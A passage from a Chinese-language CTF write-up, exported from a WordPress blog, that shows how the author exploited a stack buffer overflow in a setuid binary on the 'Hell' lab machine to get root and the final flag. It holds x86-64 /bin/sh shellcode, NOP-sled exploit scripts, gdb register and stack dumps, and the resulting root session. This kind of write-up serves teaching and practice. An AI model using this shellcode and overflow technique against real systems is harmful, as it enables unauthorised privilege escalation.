bytes\nFinal size of python file: 261 bytes\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x99&quot;\nshellcode += b&quot;\\x50\\x54\\x5f\\x52\\x66\\x68\\x2d\\x63\\x54\\x5e\\x52&quot;\nshellcode += b&quot;\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x73&quot;\nshellcode += b&quot;\\x68\\x00\\x56\\x57\\x54\\x5e\\x6a\\x3b\\x58\\x0f\\x05&quot;<\/code><\/pre>\n<p>payload\u957f44\u5b57\u8282\uff0c<code>264-44=220<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8c03\u8bd5\uff1a<\/p>\n<pre><code class=\"language-python\"># exp.py\nnop = b&#039;\\x90&#039; * 220\nrip = b&#039;B&#039;*6\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x99&quot;\nshellcode += b&quot;\\x50\\x54\\x5f\\x52\\x66\\x68\\x2d\\x63\\x54\\x5e\\x52&quot;\nshellcode += b&quot;\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\\x6e\\x2f\\x73&quot;\nshellcode += b&quot;\\x68\\x00\\x56\\x57\\x54\\x5e\\x6a\\x3b\\x58\\x0f\\x05&quot;\n\npayload = nop + shellcode + rip\n\nprint(payload)<\/code><\/pre>\n<p>\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code>\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gdb-peda -q strlen\nReading symbols from strlen...\n(No debugging symbols found in strlen)\ngdb-peda$ run $(python3 exp.py)\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffdc80 (&quot;b&#039;\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nRBX: 0x7fffffffdeb8 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nRCX: 0x15 \nRDX: 0x200400 \nRSI: 0x7fffffffe4ff (&quot;90H\\\\xb8\/bin\/sh\\\\x00\\\\x99PT_Rfh-cT^R\\\\xe8\\\\x08\\\\x00\\\\x00\\\\x00\/bin\/sh\\\\x00VWT^j;X\\\\x0f\\\\x05BBBBBB&#039;&quot;)\nRDI: 0x7fffffffdff0 (&quot;90H\\\\xb8\/bin\/sh\\\\x00\\\\x99PT_Rfh-cT^R\\\\xe8\\\\x08\\\\x00\\\\x00\\\\x00\/bin\/sh\\\\x00VWT^j;X\\\\x0f\\\\x05BBBBBB&#039;&quot;)\nRBP: 0x785c3039785c3039 (&#039;90\\\\x90\\\\x&#039;)\nRSP: 0x7fffffffdd88 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nRIP: 0x401297 (&lt;overflow+117&gt;:  ret)\nR8 : 0x75 (&#039;u&#039;)\nR9 : 0x0 \nR10: 0x7ffff7dd3238 --&gt; 0x10001a00004244 \nR11: 0x7ffff7f1f090 (&lt;__strcpy_avx2&gt;:   vpxor  xmm7,xmm7,xmm7)\nR12: 0x0 \nR13: 0x7fffffffded0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\nR14: 0x403220 --&gt; 0x401180 (&lt;__do_global_dtors_aux&gt;:    endbr64)\nR15: 0x7ffff7ffd000 --&gt; 0x7ffff7ffe2c0 --&gt; 0x0\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n   0x401290 &lt;overflow+110&gt;:     call   0x401080 &lt;strcpy@plt&gt;\n   0x401295 &lt;overflow+115&gt;:     nop\n   0x401296 &lt;overflow+116&gt;:     leave\n=&gt; 0x401297 &lt;overflow+117&gt;:     ret\n   0x401298 &lt;_fini&gt;:    endbr64\n   0x40129c &lt;_fini+4&gt;:  sub    rsp,0x8\n   0x4012a0 &lt;_fini+8&gt;:  add    rsp,0x8\n   0x4012a4 &lt;_fini+12&gt;: ret\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffdd88 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0008| 0x7fffffffdd90 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0016| 0x7fffffffdd98 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0024| 0x7fffffffdda0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0032| 0x7fffffffdda8 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0040| 0x7fffffffddb0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0048| 0x7fffffffddb8 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n0056| 0x7fffffffddc0 (&quot;90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x&quot;...)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x0000000000401297 in overflow ()<\/code><\/pre>\n<p>\u548c\u9884\u671f\u7684\u4e0d\u592a\u4e00\u6837\uff0c\u5e08\u5085\u63d0\u4f9b\u7684\u811a\u672c\u5219\u4f1a\u51fa\u73b0\u4ee5\u4e0b\u60c5\u51b5\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python2\n\noffset = 264\n\nshellcode  = b&quot;&quot;\nshellcode += b&quot;\\x6a\\x3b\\x58\\x99\\x52\\x48\\xbb\\x2f&quot;\nshellcode += b&quot;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x53&quot;\nshellcode += b&quot;\\x54\\x5f\\x52\\x57\\x54\\x5e\\x0f\\x05&quot;\n\njunk = b&quot;\\x90&quot; * (offset - len(shellcode))\n\nrip = b&quot;B&quot; * 6\n\nprint(junk + shellcode + rip)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543132.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543132.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417044457551\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230RIP\u521a\u597d\u88ab\u586b\u6ee1\uff01<\/p>\n<p>\u957f\u5ea6\u8fd8\u4e0d\u4e00\u6837\u957f\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543133.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543133.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417045928982\" \/><\/div><\/p>\n<p>\u867d\u7136\u4e0d\u77e5\u9053\u54ea\u9519\u4e86\uff0c\u4f46\u662f\u80af\u5b9a\u662f\u4e00\u4e2a\u5f88\u611a\u8822\u7684\u9519\u8bef\uff0c\u6211\u56de\u5934\u518d\u67e5\u4e00\u4e0b\uff0c\u592a\u665a\u4e86\uff0c\u5148\u641e\u5b8c\u4f11\u606f\u4e86\u3002<\/p>\n<h4>\u5bfb\u627eRIP\u5730\u5740<\/h4>\n<p>\u5bfb\u627e\u4e00\u4e2a\u5168\u662f<code>\\x90<\/code>\u7684\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">gdb-peda$ x\/300wx $rsp\n0x7fffffffe040: 0xffffe168      0x00007fff      0x00000000      0x00000002\n0x7fffffffe050: 0x00000002      0x00000000      0xf7df16ca      0x00007fff\n0x7fffffffe060: 0x00000000      0x00000000      0x004011b6      0x00000000\n0x7fffffffe070: 0x00000000      0x00000002      0xffffe168      0x00007fff\n0x7fffffffe080: 0xffffe168      0x00007fff      0x48a287ac      0x890729ff\n0x7fffffffe090: 0x00000000      0x00000000      0xffffe180      0x00007fff\n0x7fffffffe0a0: 0x00403220      0x00000000      0xf7ffd000      0x00007fff\n0x7fffffffe0b0: 0x886687ac      0x76f8d600      0x65a287ac      0x76f8c641\n0x7fffffffe0c0: 0x00000000      0x00000000      0x00000000      0x00000000\n0x7fffffffe0d0: 0x00000000      0x00000000      0xffffe168      0x00007fff\n0x7fffffffe0e0: 0xffffe168      0x00007fff      0xa2240900      0x0a9d2671\n0x7fffffffe0f0: 0x0000000e      0x00000000      0xf7df1785      0x00007fff\n0x7fffffffe100: 0x004011b6      0x00000000      0x00403220      0x00000000\n0x7fffffffe110: 0x00000000      0x00000000      0x00000000      0x00000000\n0x7fffffffe120: 0x00000000      0x00000000      0x004010d0      0x00000000\n0x7fffffffe130: 0xffffe160      0x00007fff      0x00000000      0x00000000\n0x7fffffffe140: 0x00000000      0x00000000      0x004010f5      0x00000000\n0x7fffffffe150: 0xffffe158      0x00007fff      0x00000038      0x00000000\n0x7fffffffe160: 0x00000002      0x00000000      0xffffe42b      0x00007fff\n0x7fffffffe170: 0xffffe447      0x00007fff      0x00000000      0x00000000\n0x7fffffffe180: 0xffffe556      0x00007fff      0xffffe56b      0x00007fff\n0x7fffffffe190: 0xffffe589      0x00007fff      0xffffe593      0x00007fff\n0x7fffffffe1a0: 0xffffe5b2      0x00007fff      0xffffe5c7      0x00007fff\n0x7fffffffe1b0: 0xffffe5dc      0x00007fff      0xffffe5fa      0x00007fff\n0x7fffffffe1c0: 0xffffe602      0x00007fff      0xffffe612      0x00007fff\n0x7fffffffe1d0: 0xffffe621      0x00007fff      0xffffe63d      0x00007fff\n0x7fffffffe1e0: 0xffffe650      0x00007fff      0xffffe669      0x00007fff\n0x7fffffffe1f0: 0xffffe69f      0x00007fff      0xffffe6c2      0x00007fff\n0x7fffffffe200: 0xffffe6cf      0x00007fff      0xffffe6e7      0x00007fff\n0x7fffffffe210: 0xffffe705      0x00007fff      0xffffe71c      0x00007fff\n0x7fffffffe220: 0xffffe730      0x00007fff      0xffffe742      0x00007fff\n0x7fffffffe230: 0xffffe7b9      0x00007fff      0xffffe7d8      0x00007fff\n0x7fffffffe240: 0xffffe7f3      0x00007fff      0xffffe804      0x00007fff\n0x7fffffffe250: 0xffffef27      0x00007fff      0xffffef3a      0x00007fff\n0x7fffffffe260: 0xffffef52      0x00007fff      0xffffef6a      0x00007fff\n0x7fffffffe270: 0xffffef83      0x00007fff      0xffffef98      0x00007fff\n0x7fffffffe280: 0xffffefc7      0x00007fff      0xffffefd0      0x00007fff\n0x7fffffffe290: 0x00000000      0x00000000      0x00000021      0x00000000\n0x7fffffffe2a0: 0xf7fc9000      0x00007fff      0x00000033      0x00000000\n0x7fffffffe2b0: 0x000006f0      0x00000000      0x00000010      0x00000000\n0x7fffffffe2c0: 0x178bfbff      0x00000000      0x00000006      0x00000000\n0x7fffffffe2d0: 0x00001000      0x00000000      0x00000011      0x00000000\n0x7fffffffe2e0: 0x00000064      0x00000000      0x00000003      0x00000000\n0x7fffffffe2f0: 0x00400040      0x00000000      0x00000004      0x00000000\n0x7fffffffe300: 0x00000038      0x00000000      0x00000005      0x00000000\n0x7fffffffe310: 0x0000000c      0x00000000      0x00000007      0x00000000\n0x7fffffffe320: 0xf7fcb000      0x00007fff      0x00000008      0x00000000\n0x7fffffffe330: 0x00000000      0x00000000      0x00000009      0x00000000\n0x7fffffffe340: 0x004010d0      0x00000000      0x0000000b      0x00000000\n0x7fffffffe350: 0x000003e8      0x00000000      0x0000000c      0x00000000\n0x7fffffffe360: 0x000003e8      0x00000000      0x0000000d      0x00000000\n0x7fffffffe370: 0x000003e8      0x00000000      0x0000000e      0x00000000\n0x7fffffffe380: 0x000003e8      0x00000000      0x00000017      0x00000000\n0x7fffffffe390: 0x00000000      0x00000000      0x00000019      0x00000000\n0x7fffffffe3a0: 0xffffe409      0x00007fff      0x0000001a      0x00000000\n0x7fffffffe3b0: 0x00000002      0x00000000      0x0000001f      0x00000000\n0x7fffffffe3c0: 0xffffefdc      0x00007fff      0x0000000f      0x00000000\n0x7fffffffe3d0: 0xffffe419      0x00007fff      0x0000001b      0x00000000\n0x7fffffffe3e0: 0x0000001c      0x00000000      0x0000001c      0x00000000\n0x7fffffffe3f0: 0x00000020      0x00000000      0x00000000      0x00000000\n0x7fffffffe400: 0x00000000      0x00000000      0x2409ec00      0x9d2671a2\n0x7fffffffe410: 0xffa4530a      0xd6448394      0x36387843      0x0034365f\n0x7fffffffe420: 0x00000000      0x00000000      0x2f000000      0x656d6f68\n0x7fffffffe430: 0x6c616b2f      0x65742f69      0x482f706d      0x2f6c6c65\n0x7fffffffe440: 0x6c727473      0x90006e65      0x90909090      0x90909090\n0x7fffffffe450: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe460: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe470: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe480: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe490: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4a0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4b0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4c0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4d0: 0x90909090      0x90909090      0x90909090      0x90909090\n0x7fffffffe4e0: 0x90909090      0x90909090      0x90909090      0x90909090<\/code><\/pre>\n<p>\u8fd9\u91cc\u6211\u9009\u62e9<code>0x7fffffffe460<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/usr\/bin\/python2\nfrom pwn import *\n\noffset = 264\nshellcode  = b&quot;&quot;\nshellcode += b&quot;\\x6a\\x3b\\x58\\x99\\x52\\x48\\xbb\\x2f&quot;\nshellcode += b&quot;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x53&quot;\nshellcode += b&quot;\\x54\\x5f\\x52\\x57\\x54\\x5e\\x0f\\x05&quot;\nnop = b&quot;\\x90&quot; * (offset - len(shellcode))\nrip = b&quot;\\x60\\xe7\\xff\\xff\\xff\\x7f&quot;\n\nprint(nop + shellcode + rip)<\/code><\/pre>\n<h3>\u8fd0\u884c\u62ff\u5230\u6700\u540e\u4e00\u4e2aflag[11]<\/h3>\n<pre><code class=\"language-bash\">gato@hell:\/tmp$ \/opt\/projects\/strlen $(python2 exploit2.py)\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[*] String: \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdj;X\ufffdRH\ufffd\/\/bin\/shST_RWT^p\ufffd\ufffd\ufffd\ufffd\n\n[+] Length: 270\n\n# whoami;id\nroot\nuid=0(root) gid=1000(gato) groups=1000(gato)\n# bash\nroot@hell:\/tmp# cd \/root\nroot@hell:\/root# ls -la\ntotal 48\ndrwx------  7 root root 4096 Feb 16  2023 .\ndrwxr-xr-x 19 root root 4096 Feb 16  2023 ..\nlrwxrwxrwx  1 root root    9 Feb 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3771 Feb 15  2023 .bashrc\ndrwx------  5 root root 4096 Feb 16  2023 .cache\ndrwxr-xr-x  3 root root 4096 Feb 15  2023 .config\n-rw-r--r--  1 root root   30 Feb 15  2023 .gdbinit\n-rw-------  1 root root   20 Feb 16  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Feb 15  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root    0 Feb 16  2023 .selected_editor\ndrwx------  2 root root 4096 Feb 16  2023 .ssh\ndrwxr-xr-x  2 root root 4096 Feb 16  2023 containers\n-rw-r--r--  1 root root  733 Feb 16  2023 flag.txt\nroot@hell:\/root# cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003 \u2003\u2588 \u2588\u2003\u2588\u2580\u2580\u2003\u2588  \u2003\u2588  \n\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003 \u2003\u2588\u2580\u2588\u2003\u2588\u2588\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2584\u2584\n\nFlag 11: HELL{0V3RF10W_F0R_B3G1NN3R5}\n\nCongratulations on completing this CTF!\n\n- Do you want to tell me what you thought or if you would add\/change anything?\n- Do you want to support me by following me on the networks?\n- Have you found any unexpected route?\n\nContact me through the following links:\n\nGithub:    https:\/\/github.com\/GatoGamer1155\nTwitter:   https:\/\/twitter.com\/GatoGamer1155\nYouTube:   https:\/\/www.youtube.com\/@GatoGamer1155\nDiscord:   https:\/\/discord.com\/users\/866396648691597374\nInstagram: https:\/\/www.instagram.com\/GatoGamer1155<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Hell \u4f5c\u8005\u6709\u4e2areadme.txt When booting the machine log in wit [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,20,21,24,19,22,18],"tags":[],"class_list":["post-577","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-crypto","category-misc","category-penetration-test","category-pwn","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/577","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=577"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/577\/revisions"}],"predecessor-version":[{"id":579,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/577\/revisions\/579"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=577"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=577"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}